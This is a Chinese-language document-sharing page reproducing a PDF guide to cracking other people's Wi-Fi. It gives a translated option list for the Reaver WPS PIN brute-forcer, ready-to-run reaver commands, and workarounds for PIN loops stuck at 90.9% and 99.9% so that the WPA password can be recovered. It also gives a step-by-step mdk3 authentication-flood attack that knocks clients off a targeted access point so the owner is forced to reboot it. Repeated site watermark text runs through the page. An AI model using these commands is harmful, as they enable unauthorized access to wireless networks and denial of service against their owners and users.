《2022年PIN死循环解决方法及mdk攻击模式详解 .pdf》由会员分享,可在线阅读,更多相关《2022年PIN死循环解决方法及mdk攻击模式详解 .pdf(12页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、破解 WPA 时,PIN 出现死循环处理方法。如下面这个例子,一开始,或者破解一段时间后出来PIN 无限循环:本人经过多次实验最后总结了解决的办法:Required Arguments: -i, -interface= Name of the monitor-mode interface to use 网卡的监视接口,通常是mon0 -b, -bssid= BSSID of the target AP AP的 MAC地址Optional Arguments: -m, -mac= MAC of the host system 名师资料总结 - - -精品资料欢迎下载 - - - - - - -
2、- - - - - - - - - - - 名师精心整理 - - - - - - - 第 1 页,共 12 页 - - - - - - - - - 指定本机 MAC地址,在 AP有 MAC过滤的时候需要使用-e, -essid= ESSID of the target AP 路由器的 ESSID,一般不用指定-c, -channel= Set the 802.11 channel for the interface (implies -f) 信号的频道,如果不指定会自动扫描-o, -out-file= Send output to a log file stdout 标准输出到文件-s, -s
3、ession= Restore a previous session file 恢复进程文件-C, -exec= Execute the supplied command upon successful pin recovery pin 成功后执行命令-D, -daemonize Daemonize reaver 设置 reaver 成 Daemon -a, -auto Auto detect the best advanced options for the target AP 对目标 AP自动检测高级参数-f, -fixed Disable channel hopping 禁止频道跳转-5
4、, -5ghz Use 5GHz 802.11 channels 使用 5G 频道-v, -verbose Display non-critical warnings (-vv for more) 显示不重要警告信息-vv 可以显示更多-q, -quiet Only display critical messages 只显示关键信息-h, -help Show help 显示帮助Advanced Options: -p, -pin= Use the specified 4 or 8 digit WPS pin 直接读取 psk(本人测试未成功,建议用网卡自带软件获取)-d, -delay= S
5、et the delay between pin attempts 1 pin 间延时,默认 1 秒,推荐设 0 -l, -lock-delay= Set the time to wait if the AP locks WPS pin attempts 60 AP锁定 WPS后等待时间-g, -max-attempts= Quit after num pin attempts 最大 pin 次数-x, -fail-wait= Set the time to sleep after 10 unexpected failures 0 10 次意外失败后等待时间,默认0 秒-r, -recurri
6、ng-delay= Sleep for y seconds every x pin attempts 每 x 次 pin 后等待 y 秒-t, -timeout= Set the receive timeout period 5 收包超时,默认 5 秒-T, -m57-timeout= Set the M5/M7 timeout period 0.20 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 2 页,共 12 页 - - - - - - - - - M5/M7 超时,默认 0
7、.2 秒-A, -no-associate Do not associate with the AP (association must be done by another application) 不连入 AP(连入过程必须有其他程序完成)-N, -no-nacks Do not send NACK messages when out of order packets are received 不发送 NACK信息(如果一直 pin 不动,可以尝试这个参数)-S, -dh-small Use small DH keys to improve crack speed 使用小 DH 关键值提高
8、速度(推荐使用)-L, -ignore-locks Ignore locked state reported by the target AP 忽略目标 AP报告的锁定状态-E, -eap-terminate Terminate each WPS session with an EAP FAIL packet 每当收到 EAP失败包就终止 WPS进程-n, -nack Target AP always sends a NACK Auto 对目标 AP总是发送 NACK,默认自动-w, -win7 Mimic a Windows 7 registrar False 模拟 win7 注册,默认关闭
9、- 个人心得 - 对一个 ap 刚开始 pin 的时候打开 -vv 参数,如果顺利,就中断,然后改成-v 继续 pin,反正进度是可以保存的reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S 如果一直 pin 不动,尝试加 -N 参数reaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S N 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 3 页,共 12 页 - - - - - - -
10、- - AP 洪水攻击1、打气筒mdk3攻击模式操作方法首先检测网卡:ifconfig -a 然后模拟端口:airmon-ng start wlan0 接下来用:airodump-ng mon0 扫描 ap 找到你 pin 死的路由器 mac 用 mdk3 做身份验证攻击mdk3 mon0 a -a mac (被 pin 死的路由器的 mac)身份验证攻击效果说明:此攻击是针对无线AP 的洪水攻击,又叫做身份验证攻击。其原理就是向AP 发动大量的虚假的链接请求, 这种请求数量一旦超过了无线 AP所能承受的范围, AP 就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。说
11、明:此命令功能强大,使用错误会造成所有ap 不能使用, 请指定 mac 地址 ,然后使用,其余命令不要乱试。你要使用此命令的其他参数,请详细阅读此命令参数详解2、CDlinux mdk3攻击模式操作方法首先进入CDlinux , 打开水滴或者打气筒搜索pin 死的 MAC 地址 (直接打开螃蟹或者3070 驱动搜索无线MAC地址也 OK )。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 4 页,共 12 页 - - - - - - - - - 然后点击左下角CDlnux 图标,依次
12、打开无线安全 -mdk3-v6 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 5 页,共 12 页 - - - - - - - - - 进入 mdk3后输入命令mdk3 mon0 a -a 40:16:9F:*:2C:B2(40:16:9F:*:2C:B2为你 pin 死的路由的MAC ,注意空格和大小写)回车后进入攻击模式,时间不要太长,最多半分钟就可以关闭对话框然后重新扫描网络看pin 死的路由是不是已经不在了。等待主人重启吧 非 CDLinux 可以在这里启动命令输入框名师资
13、料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 6 页,共 12 页 - - - - - - - - - 注意:1、只有客户端在线时进行攻击才可能达到迫使重启目的,信号越强,效果越佳。2、每次攻击最好不超5min,否则卡死(看机器配置),稍停1min 在进行攻击,连续攻击三次应该就可以了!名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 7 页,共 12 页 - - - - - -
14、 - - - 8C210A pin重码或者 pin 死路由器的解决办法(我验证貌似有效 )看看我重码拼死后,的时候拼死路由器后 , 整整一晚上没有在找到这个信号,今天起床在看, 发现又出来了 , 继续拼 , 发现 , 重码非常非常的严重 ,今天中午放弃N次, 今晚在小试一下, 加了参数后 , 大减少重码 , 坚持就是胜利 , 往下看。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 8 页,共 12 页 - - - - - - - - - 看到了吧 ,重码 , 不过 , 是偶偶的了 ,
15、 加了参数后 , 不会像昨天和今天上午那样,一直重码一个码不动了. 在往下看 , 奇迹出现了。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 9 页,共 12 页 - - - - - - - - - Pin 码重复出现死循环解决办法1. xiaopanOS环境解决之道:当你看到PIN 到一定程度,窗口里的PIN 码不变、进度百分比也不走,那么,保持原窗口不变,再点击ROOTSHELL 图标,新开一个PIN 窗口,输入 reaver -i mon0 -b 正在 PIN 的 MAC -a
16、 -s -vv (注意:这里“S”要小写 ) 那么,你就会发现原来PIN 的窗口, PIN 码开始改变,进度开始前进了!而且PIN 的时间也大为缩短了! 如果是 PJ到 99.99%, 执行此部操作就马上弹出正确的pin 码和 wifi密码,以及路由器的SSID 名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 10 页,共 12 页 - - - - - - - - - PIN 码和密码。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - -
17、- - - - 名师精心整理 - - - - - - - 第 11 页,共 12 页 - - - - - - - - - pin 过程中解决 90.9%和 99.9%死循环的实践,证明非常有效。pin 到 90.9%死循环,说明前四位已经pin 完,但是没出;原因大概就是AP没发出确认信息,reaver 就已经跳过了,从而错过了正确前四位的确认。pin 到 99.9%死循环,说明后四位的前三已经跑完,但是没出。原因同上。经过实践,已经找到原因所在,论坛里的方法,大概MAC 后跟的后缀都是-vv -a -S,然而,殊不知,这样的后缀虽然可以加快速度,但是,也有可能会错过正确前四等的确认。所以,不放过每一次确认信息的表达式是reaver -i mon0 -b MAC -v -a -n ,其他的就不用了。还可以加一个-c。基本从我遇到90.9%和 99.9%的死循环的实践来看,已经100%成功了。名师资料总结 - - -精品资料欢迎下载 - - - - - - - - - - - - - - - - - - 名师精心整理 - - - - - - - 第 12 页,共 12 页 - - - - - - - - -